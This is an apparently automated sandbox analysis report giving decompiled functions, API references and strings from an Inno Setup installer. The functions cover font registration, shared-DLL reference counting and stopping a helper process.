CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048AEE9,?,?,00000000,?,00000000,00000000,?,0048B209,00000000), ref: 0048ABD2
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048AEE9,?,?,00000000,?,00000000,00000000), ref: 0048ABE2
MsgWaitForMultipleObjects.USER32 ref: 0048AC03
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048AEE9,?,?,00000000,?,00000000), ref: 0048AC13

Part of subcall function 0042D468: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4F3,?,?,00000000,?,?,0048A56C,00000000,0048A6FF,?,?,00000005), ref: 0042D49D

Part of subcall function 0044FF24: 6D2B5CA0.KERNEL32(00000000,?,00000000,00000000,?,00000080,00000000,?,00000000,?,?,0048A596,00000001,00000000,00000002,00000000), ref: 0044FF7D

Strings

/REG, xrefs: 0048AB71
Setup, xrefs: 0048ABAB
.lst, xrefs: 0048AC50
/REGU, xrefs: 0048AB95
Inno-Setup-RegSvr-Mutex, xrefs: 0048ABC9
.msg, xrefs: 0048AC36

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
API String ID: 2000705611-3672972446
Opcode ID: df23275077c8387b57a94903f1cf9ae6f1ce578ebee1f32d9f849e06fde58e3e
Instruction ID: e61ec732ee02e9eb4697f92d47cee9573449ed76c6b8a2e0d3c3e0afc1dc4e64
Opcode Fuzzy Hash: df23275077c8387b57a94903f1cf9ae6f1ce578ebee1f32d9f849e06fde58e3e
Instruction Fuzzy Hash: 8A91D230A042049FEB11FBA5C852BAE77F5EB09704F514CA7F500A7792D6BCAD14CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004684DC Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 116
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004684DC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				long _v16;
				char _v20;
				char _v24;
				void* _t21;
				long _t30;
				void* _t39;
				void* _t48;
				void* _t60;
				intOrPtr _t72;
				intOrPtr _t76;
				void* _t82;
				void* _t85;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v24 = 0;
				_t60 = __ecx;
				_t80 = __edx;
				_t82 = __eax;
				_push(_t85);
				_push(0x468634);
				_push( *[fs:eax]);
				 *[fs:eax] = _t85 + 0xffffffec;
				if( *0x4ae24f == 0) {
					_t21 = E0042DD88(0, "Software\\Microsoft\\Windows\\CurrentVersion\\Fonts", 0x80000002,  &_v8, 2, 0);
					__eflags = _t21;
					if(_t21 != 0) {
						E00455814("Failed to open Fonts registry key.", __ecx, __edx, _t82);
					} else {
						_push(E004036BC(_t82) + 1);
						_push(E00403880(_t82));
						_push(1);
						_push(0);
						_push(E00403880(__edx));
						_t48 = _v8;
						_push(_t48);
						L00405934();
						__eflags = _t48;
						if(_t48 != 0) {
							E00455814("Failed to set value in Fonts registry key.", __ecx, __edx, _t82);
						}
						RegCloseKey(_v8);
					}
				} else {
					if(E0042D118(0x46864c, __edx, 0) == 0) {
						_v16 = GetLastError();
						_v12 = 0;
						E00455A04("Failed to create [Fonts] entry in WIN.INI. (%d)", _t60, 0,  &_v16, _t80, _t82);
					}
				}
				if(_t60 == 0) {
					L13:
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x46863b);
					return E00403568( &_v24, 2);
				} else {
					while(1) {
						SetLastError(0);
						if(AddFontResourceA(E00403880(_t82)) != 0) {
							break;
						}
						_t30 = GetLastError();
						_v16 = "AddFontResource";
						E00406E04(_t30,  &_v24);
						_v12 = _v24;
						E00450C2C(0x32, 1,  &_v16,  &_v20);
						_t76 =  *0x48dc20; // 0x21e9730
						_t39 = E00466D28(_v20, _t30, 1, _t76, _t80, _t82, __eflags);
						__eflags = _t39;
						if(_t39 == 0) {
							continue;
						}
						goto L13;
					}
					SendNotifyMessageA(0xffff, 0x1d, 0, 0);
					goto L13;
				}
			}

0x004684e2
0x004684e3
0x004684e4
0x004684e7
0x004684ea
0x004684ed
0x004684ef
0x004684f1
0x004684f5
0x004684f6
0x004684fb
0x004684fe
0x00468508
0x00468553
0x00468558
0x0046855a
0x004685a0
0x0046855c
0x00468564
0x0046856c
0x0046856d
0x0046856f
0x00468578
0x00468579
0x0046857c
0x0046857d
0x00468582
0x00468584
0x0046858b
0x0046858b
0x00468594
0x00468594
0x0046850a
0x0046851c
0x00468527
0x0046852a
0x00468538
0x00468538
0x0046851c
0x004685a7
0x00468619
0x0046861b
0x0046861e
0x00468621
0x00468633
0x004685a9
0x004685ab
0x004685ad
0x004685c1
0x00000000
0x00000000
0x004685d5
0x004685e5
0x004685ed
0x004685f5
0x00468602
0x0046860a
0x00468610
0x00468615
0x00468617
0x00000000
0x00000000
0x00000000
0x00468617
0x004685ce
0x00000000
0x004685ce

APIs

GetLastError.KERNEL32(00000000,00468634), ref: 00468522
6D2B68C0.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00468634), ref: 0046857D
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00468634), ref: 00468594
SetLastError.KERNEL32(00000000,?,00000002,00000000,00000000,00468634), ref: 004685AD
AddFontResourceA.GDI32(00000000), ref: 004685BA
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004685CE

Part of subcall function 0042D118: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042D14E

GetLastError.KERNEL32(00000000,?,00000002,00000000,00000000,00468634), ref: 004685D5

Strings

Failed to set value in Fonts registry key., xrefs: 00468586
Failed to create [Fonts] entry in WIN.INI. (%d), xrefs: 00468533
Software\Microsoft\Windows\CurrentVersion\Fonts, xrefs: 00468547
Failed to open Fonts registry key., xrefs: 0046859B
AddFontResource, xrefs: 004685E0
Fonts, xrefs: 00468510

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLast$CloseFontMessageNotifyPrivateProfileResourceSendStringWrite
String ID: AddFontResource$Failed to create [Fonts] entry in WIN.INI. (%d)$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.$Fonts$Software\Microsoft\Windows\CurrentVersion\Fonts
API String ID: 3576145794-759941513
Opcode ID: 2d783c3be1a6c2726977d036b629c7a9cd40f7b47c5e01023e54878a2c7e076f
Instruction ID: 6ae18959823538964dd21c19e344da7b3fd60542473f18502772690ba87a4b65
Opcode Fuzzy Hash: 2d783c3be1a6c2726977d036b629c7a9cd40f7b47c5e01023e54878a2c7e076f
Instruction Fuzzy Hash: 483157717006046ADB10FBA58C42B6F77A89B44704F54867FB905EB3C2EE7C9E058A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5C4 Relevance: 21.1, APIs: 14, Instructions: 126
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0041B5C4(struct HDC__* __eax, void* __ecx, void* __edx) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t73;
				intOrPtr _t78;
				void* _t85;
				void* _t87;
				void* _t89;
				intOrPtr _t90;

				_t87 = _t89;
				_t90 = _t89 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_push(0);
				L00405CDC();
				_v28 = __eax;
				_push(0);
				L00405CDC();
				_v32 = __eax;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00406034();
					_v24 = _t37;
					if(_v24 == 0) {
						E0041B5AC();
					}
					_push(_t87);
					_push(0x41b673);
					_push( *[fs:eax]);
					 *[fs:eax] = _t90;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00405CD4();
					_v20 = _t41;
					if(_v20 == 0) {
						E0041B5AC();
					}
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(E0041B67A);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L0040621C();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00405CC4();
					_v20 = _t47;
					if(_v20 != 0) {
						_t73 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t73 != 0) {
							SelectObject(_v28, _t73);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					DeleteDC(_v28);
					DeleteDC(_v32);
					return _v20;
				}
			}

0x0041b5c5
0x0041b5c7
0x0041b5d2
0x0041b5d3
0x0041b5d6
0x0041b5d9
0x0041b5db
0x0041b5e0
0x0041b5e3
0x0041b5e5
0x0041b5ea
0x0041b5f7
0x0041b5fe
0x0041b618
0x0041b61a
0x0041b61f
0x0041b626
0x0041b628
0x0041b628
0x0041b62f
0x0041b630
0x0041b635
0x0041b638
0x0041b63e
0x0041b642
0x0041b643
0x0041b646
0x0041b647
0x0041b64c
0x0041b653
0x0041b655
0x0041b655
0x0041b65c
0x0041b65f
0x0041b662
0x0041b667
0x0041b66a
0x0041b66b
0x0041b66d
0x0041b672
0x0041b600
0x0041b600
0x0041b602
0x0041b604
0x0041b609
0x0041b60a
0x0041b60d
0x0041b60e
0x0041b613
0x0041b67e
0x0041b68d
0x0041b69c
0x0041b6c3
0x0041b6ca
0x0041b6d1
0x0041b6d1
0x0041b6d8
0x0041b6df
0x0041b6df
0x0041b6d8
0x0041b6e8
0x0041b6f1
0x0041b6ff
0x0041b6ff

APIs

740BA590.GDI32(00000000,?,00000000,?), ref: 0041B5DB
740BA590.GDI32(00000000,00000000,?,00000000,?), ref: 0041B5E5
GetObjectA.GDI32(?,00000018,00000004), ref: 0041B5F7
740BA410.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B60E
740BAC50.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B61A
740BA520.GDI32(00000000,0000000B,?,00000000,0041B673,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B647
740BB380.USER32(00000000,00000000,0041B67A,00000000,0041B673,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B66D
SelectObject.GDI32(00000000,?), ref: 0041B688
SelectObject.GDI32(?,00000000), ref: 0041B697
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B6C3
SelectObject.GDI32(00000000,00000000), ref: 0041B6D1
SelectObject.GDI32(?,00000000), ref: 0041B6DF
DeleteDC.GDI32(00000000), ref: 0041B6E8
DeleteDC.GDI32(?), ref: 0041B6F1

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Object$Select$A590Delete$A410A520B380Stretch
String ID:
API String ID: 956127455-0
Opcode ID: 99165526eb5114334335235d3c1d16b6db5cae891b8a6fcfdf7d45d984e8fcd7
Instruction ID: 114ef432667551bc7aed0a2de5a91f3fa5b54506007c760ab781620761e9a88c
Opcode Fuzzy Hash: 99165526eb5114334335235d3c1d16b6db5cae891b8a6fcfdf7d45d984e8fcd7
Instruction Fuzzy Hash: CB41EB71E40609AFDB10EBE9D846FEFB7B8EB18704F104466B604FB281C6785D408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00452E24 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244
registryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00452E24(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				char _v17;
				char _v24;
				int _v28;
				int _v32;
				char _v36;
				char _v40;
				char* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _v64;
				char _v68;
				char _v72;
				void* _t75;
				void* _t94;
				void* _t99;
				void* _t126;
				void* _t161;
				void* _t166;
				intOrPtr _t184;
				intOrPtr _t188;
				intOrPtr _t190;
				void* _t202;
				void* _t203;
				intOrPtr _t204;

				_t202 = _t203;
				_t204 = _t203 + 0xffffffbc;
				_v40 = 0;
				_v52 = 0;
				_v68 = 0;
				_v72 = 0;
				_v36 = 0;
				_v8 = __edx;
				_push(_t202);
				_push(0x4530f4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t204;
				_v9 = 0;
				_t166 = E0042DD88(_t75, "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs", 0x80000002,  &_v16, 3, 0);
				if(_t166 == 2) {
					L28:
					_pop(_t184);
					 *[fs:eax] = _t184;
					_push(E004530FB);
					E00403568( &_v72, 2);
					E00403548( &_v52);
					return E00403568( &_v40, 2);
				} else {
					if(_t166 != 0) {
						E00451CA4(0x80000002,  &_v52);
						_v48 = _v52;
						_v44 = "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs";
						E00450C2C(0x3e, 1,  &_v48,  &_v40);
						E004036C4( &_v40, 0x453188);
						_push( &_v40);
						_v64 = "RegOpenKeyEx";
						E00406E04(_t166,  &_v68);
						_v60 = _v68;
						E0042E7A4(_t166,  &_v72);
						_v56 = _v72;
						E00450C2C(0x34, 2,  &_v64,  &_v52);
						_pop(_t161);
						E004036C4(_t161, _v52);
						E00408DF0(_v40, 1);
						E00403264();
					}
					_push(_t202);
					_push(0x4530bd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t204;
					if(RegQueryValueExA(_v16, E00403880(_v8), 0,  &_v28, 0,  &_v32) == 0) {
						_v17 = 0;
						_v24 = 0;
						_push(_t202);
						_push(0x453007);
						_push( *[fs:eax]);
						 *[fs:eax] = _t204;
						_t94 = _v28 - 1;
						if(_t94 == 0) {
							if(E0042DCB8() != 0) {
								_v24 = E00406E34(_v36,  &_v36);
								_v17 = 1;
							}
						} else {
							_t126 = _t94 - 2;
							if(_t126 == 0) {
								if(_v32 >= 1 && _v32 <= 4 && RegQueryValueExA(_v16, E00403880(_v8), 0, 0,  &_v24,  &_v32) == 0) {
									_v17 = 1;
								}
							} else {
								if(_t126 == 1) {
									_v32 = 4;
									if(RegQueryValueExA(_v16, E00403880(_v8), 0, 0,  &_v24,  &_v32) == 0) {
										_v17 = 1;
									}
								}
							}
						}
						_pop(_t188);
						 *[fs:eax] = _t188;
						if(_v17 != 0) {
							_v24 = _v24 - 1;
							if(_v24 > 0) {
								_t99 = _v28 - 1;
								if(_t99 == 0) {
									E00406E04(_v24,  &_v36);
									_push(E004036BC(_v36) + 1);
									_push(E00403880(_v36));
									_push(1);
									_push(0);
									_push(E00403880(_v8));
									_push(_v16);
									L00405934();
								} else {
									if(_t99 + 0xfffffffe - 2 < 0) {
										_push(4);
										_push( &_v24);
										_push(_v28);
										_push(0);
										_push(E00403880(_v8));
										_push(_v16);
										L00405934();
									}
								}
							} else {
								_v9 = 1;
								_push(E00403880(_v8));
								_push(_v16);
								L004058FC();
							}
							_pop(_t190);
							 *[fs:eax] = _t190;
							_push(E004530C4);
							return RegCloseKey(_v16);
						} else {
							E00403304();
							goto L28;
						}
					} else {
						E00403304();
						goto L28;
					}
				}
			}

0x00452e25
0x00452e27
0x00452e2f
0x00452e32
0x00452e35
0x00452e38
0x00452e3b
0x00452e3e
0x00452e43
0x00452e44
0x00452e49
0x00452e4c
0x00452e4f
0x00452e6a
0x00452e6f
0x004530c4
0x004530c6
0x004530c9
0x004530cc
0x004530d9
0x004530e1
0x004530f3
0x00452e75
0x00452e77
0x00452e89
0x00452e91
0x00452e99
0x00452ea6
0x00452eb3
0x00452ebb
0x00452ec5
0x00452ecd
0x00452ed5
0x00452edd
0x00452ee5
0x00452ef2
0x00452efa
0x00452efb
0x00452f0a
0x00452f0f
0x00452f0f
0x00452f16
0x00452f17
0x00452f1c
0x00452f1f
0x00452f44
0x00452f50
0x00452f56
0x00452f5b
0x00452f5c
0x00452f61
0x00452f64
0x00452f6a
0x00452f6b
0x00452f89
0x00452f93
0x00452f96
0x00452f96
0x00452f6d
0x00452f6d
0x00452f70
0x00452fa0
0x00452fca
0x00452fca
0x00452f72
0x00452f73
0x00452fd0
0x00452ff7
0x00452ff9
0x00452ff9
0x00452ff7
0x00452f73
0x00452f70
0x00452fff
0x00453002
0x00453015
0x00453021
0x00453028
0x00453045
0x00453046
0x00453058
0x00453066
0x0045306f
0x00453070
0x00453072
0x0045307c
0x00453080
0x00453081
0x00453048
0x0045304e
0x00453088
0x0045308d
0x00453091
0x00453092
0x0045309c
0x004530a0
0x004530a1
0x004530a1
0x0045304e
0x0045302a
0x0045302a
0x00453036
0x0045303a
0x0045303b
0x0045303b
0x004530a8
0x004530ab
0x004530ae
0x004530bc
0x00453017
0x00453017
0x00000000
0x00453017
0x00452f46
0x00452f46
0x00000000
0x00452f46
0x00452f44

APIs

Part of subcall function 0042DD88: 6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,004530BD,?,?,00000003,00000000,00000000,004530F4), ref: 00452F3D

Part of subcall function 0042E7A4: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004500A0,00000000,004500ED,?,0044FE48,00000000,69465405), ref: 0042E7C3

RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00453007,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00452FC1
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00453007,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00452FF0

Strings

Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452E5B
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452E94
RegOpenKeyEx, xrefs: 00452EC0
, xrefs: 00452EAE

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: QueryValue$B6790FormatMessage
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 575729644-1577016196
Opcode ID: d21340daf22d2b322a74928297d67fb00db7b228447407613f4b0ae619ceba98
Instruction ID: f0f06302b16a9815ba21b78fb4cc8545cb9268b005c5c3101c683070ae3b9185
Opcode Fuzzy Hash: d21340daf22d2b322a74928297d67fb00db7b228447407613f4b0ae619ceba98
Instruction Fuzzy Hash: 01916371900208ABDB11EFA5D942BDEB7F8EB08745F10406BF900F72C2D6799E099B69

Uniqueness

Uniqueness Score: -1.00%

Function 00455FB0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 63
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00455FB0(void* __eax) {
				long _v12;
				long _v16;
				void* __ebx;
				void* __esi;
				void* _t7;
				void* _t27;
				void* _t30;
				DWORD* _t32;

				_t4 = __eax;
				_t32 =  &_v12;
				_t27 = __eax;
				if( *0x48df0c == 0) {
					L11:
					return _t4;
				}
				 *0x48df0d = 1;
				E00455814("Stopping 64-bit helper process.", __eax, _t30, 0x48df10);
				_t7 =  *0x48df14; // 0x0
				CloseHandle(_t7);
				 *0x48df14 = 0;
				while(WaitForSingleObject( *0x48df10, 0x2710) == 0x102) {
					E00455814("Helper isn\'t responding; killing it.", _t27, _t30, 0x48df10);
					TerminateProcess( *0x48df10, 1);
				}
				if(GetExitCodeProcess( *0x48df10, _t32) == 0) {
					E00455814("Helper process exited, but failed to get exit code.", _t27, _t30, 0x48df10);
				} else {
					if( *_t32 != 0) {
						_v16 =  *_t32;
						_v12 = 0;
						E00455A04("Helper process exited with failure code: 0x%x", _t27, 0,  &_v16, _t30, 0x48df10);
					} else {
						E00455814("Helper process exited.", _t27, _t30, 0x48df10);
					}
				}
				CloseHandle( *0x48df10);
				_t4 = 0;
				 *0x48df10 = 0;
				 *0x48df0c = 0;
				if(_t27 == 0) {
					goto L11;
				} else {
					Sleep(0xfa);
					return 0;
				}
			}

0x00455fb0
0x00455fb2
0x00455fb5
0x00455fc3
0x00456083
0x00456083
0x00456083
0x00455fc9
0x00455fd5
0x00455fda
0x00455fe0
0x00455fe7
0x00456002
0x00455ff3
0x00455ffd
0x00455ffd
0x00456021
0x00456058
0x00456023
0x00456027
0x00456038
0x0045603c
0x0045604c
0x00456029
0x0045602e
0x0045602e
0x00456027
0x00456060
0x00456065
0x00456067
0x00456069
0x00456072
0x00000000
0x00456074
0x00456079
0x00000000
0x00456079

APIs

Part of subcall function 00455814: GetLocalTime.KERNEL32(?,00000000,0045599B,?,?,0048DF10,00000000), ref: 00455844

CloseHandle.KERNEL32(00000000), ref: 00455FE0
TerminateProcess.KERNEL32(00000000,00000001,00000000,00002710,00000000), ref: 00455FFD
WaitForSingleObject.KERNEL32(00000000,00002710,00000000), ref: 0045600A
GetExitCodeProcess.KERNEL32 ref: 0045601A
CloseHandle.KERNEL32(00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 00456060
Sleep.KERNEL32(000000FA,00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 00456079

Strings

Helper process exited with failure code: 0x%x, xrefs: 00456047
Helper process exited, but failed to get exit code., xrefs: 00456053
Helper isn't responding; killing it., xrefs: 00455FEE
Helper process exited., xrefs: 00456029
Stopping 64-bit helper process., xrefs: 00455FD0

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitLocalObjectSingleSleepTerminateTimeWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process.
API String ID: 3354603272-531598853
Opcode ID: abd53da1f6fc082e815e93d811b669fa015146d12ac66528a9001bd0a82b319c
Instruction ID: 094fb26bf9f53f78862e1f0a79d14bc4959a26d3316dea152a4a3eb2cd331462
Opcode Fuzzy Hash: abd53da1f6fc082e815e93d811b669fa015146d12ac66528a9001bd0a82b319c
Instruction Fuzzy Hash: F2117F70A056409ADB10FBB9884171A23D49F09706F51882FBA85CB3D3D67D88489B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00452AD8 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00452AD8(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v5;
				void* _v12;
				char _v16;
				int _v20;
				char _v24;
				int _v28;
				int _v32;
				char _v36;
				char* _v40;
				char _v44;
				char* _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v72;
				char _v76;
				void* _t81;
				void* _t82;
				signed int _t92;
				void* _t96;
				void* _t125;
				void* _t130;
				void* _t162;
				intOrPtr _t184;
				intOrPtr _t186;
				void* _t199;
				void* _t201;
				void* _t202;
				intOrPtr _t203;

				_t201 = _t202;
				_t203 = _t202 + 0xffffffb8;
				_v44 = 0;
				_v56 = 0;
				_v72 = 0;
				_v76 = 0;
				_v36 = 0;
				_v5 = __ecx;
				_t199 = __edx;
				_push(_t201);
				_push(0x452d73);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				_t82 = E0042DD50(_t81, "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs", 0x80000002,  &_v16,  &_v12, 0, 3, 0, 0, 0);
				_t168 = _t82;
				if(_t82 != 0) {
					E00451CA4(0x80000002,  &_v56);
					_v52 = _v56;
					_v48 = "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs";
					E00450C2C(0x3e, 1,  &_v52,  &_v44);
					E004036C4( &_v44, 0x452e04);
					_push( &_v44);
					_v68 = "RegCreateKeyEx";
					E00406E04(_t168,  &_v72);
					_v64 = _v72;
					E0042E7A4(_t168,  &_v76);
					_v60 = _v76;
					E00450C2C(0x34, 2,  &_v68,  &_v56);
					_pop(_t162);
					E004036C4(_t162, _v56);
					E00408DF0(_v44, 1);
					E00403264();
				}
				_v40 = E00403880(_t199);
				_v24 = 0;
				_v32 = 4;
				_push(_t201);
				_push(0x452caf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t203;
				if(RegQueryValueExA(_v12, _v40, 0,  &_v28, 0,  &_v20) == 0) {
					_t125 = _v28 - 1;
					if(_t125 == 0) {
						if(E0042DCB8() != 0) {
							_v24 = E00406E34(_v36,  &_v36);
							_v32 = 1;
						}
					} else {
						_t130 = _t125 - 2;
						if(_t130 == 0) {
							if(_v20 >= 1 && _v20 <= 4) {
								if(RegQueryValueExA(_v12, _v40, 0, 0,  &_v24,  &_v20) != 0) {
									E00408DC4();
								}
								_v32 = 3;
							}
						} else {
							if(_t130 == 1) {
								_v20 = 4;
								if(RegQueryValueExA(_v12, _v40, 0, 0,  &_v24,  &_v20) != 0) {
									E00408DC4();
								}
							}
						}
					}
				}
				_t92 = 0;
				_pop(_t184);
				 *[fs:eax] = _t184;
				if(_v24 < 0) {
					_t92 = 0;
					_v24 = 0;
				}
				if(((_t92 & 0xffffff00 | _v24 == 0x00000000) & _v5) != 0) {
					_v24 = _v24 + 1;
				}
				_v24 = _v24 + 1;
				_t96 = _v32 - 1;
				if(_t96 == 0) {
					E00406E04(_v24,  &_v36);
					_push(E004036BC(_v36) + 1);
					_push(E00403880(_v36));
					_push(_v32);
					_push(0);
					_push(_v40);
					_push(_v12);
					L00405934();
				} else {
					if(_t96 + 0xfffffffe - 2 < 0) {
						_push(4);
						_push( &_v24);
						_push(_v32);
						_push(0);
						_push(_v40);
						_push(_v12);
						L00405934();
					}
				}
				RegCloseKey(_v12);
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(0x452d7a);
				E00403568( &_v76, 2);
				E00403548( &_v56);
				E00403548( &_v44);
				return E00403548( &_v36);
			}

0x00452ad9
0x00452adb
0x00452ae3
0x00452ae6
0x00452ae9
0x00452aec
0x00452aef
0x00452af2
0x00452af5
0x00452af9
0x00452afa
0x00452aff
0x00452b02
0x00452b21
0x00452b26
0x00452b2a
0x00452b3c
0x00452b44
0x00452b4c
0x00452b59
0x00452b66
0x00452b6e
0x00452b78
0x00452b80
0x00452b88
0x00452b90
0x00452b98
0x00452ba5
0x00452bad
0x00452bae
0x00452bbd
0x00452bc2
0x00452bc2
0x00452bce
